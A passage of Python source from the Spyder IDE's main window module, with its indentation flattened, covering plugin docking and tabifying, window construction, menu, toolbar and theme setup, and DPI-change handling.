This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
        # If TABIFY is not defined, fall back to the given default.
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
        # Bail out if TABIFY resolves to an empty list or only contains None.
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
        Call the exception handler of the Console plugin. It is provided as
        a signal on the Plugin API for convenience, so that plugins do not
        need to call the Console plugin explicitly.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
        >>> error_data = {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
                # Make Spyder quit when pressing Ctrl+C in the console.
                # In DEV mode Ctrl+C doesn't quit, because it helps to
                # capture the traceback when Spyder freezes.
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
            with open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')) as f:
                mac_style = f.read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
        # Mapping of new plugin identifiers vs old attribute names
        # given for plugins, also used to prevent collisions with other
        # attributes, e.g. layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
        # Set a shutdown QTimer if running in CI (TEST_CI_APP is set)
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole,
Plugins.Projects]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
if plugin_name == Plugins.Projects:
self.project_path = plugin_instance.get_pythonpath(
at_start=True)
else:
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
self.consoles_menu = mainmenu.get_application_menu("consoles_menu")
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
self.projects_menu = mainmenu.get_application_menu("projects_menu")
self.projects_menu.aboutToShow.connect(self.valid_project)
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attribute
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > Application > "
"Interface</tt>, in case Spyder is not displayed "
"correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is a submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is a submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
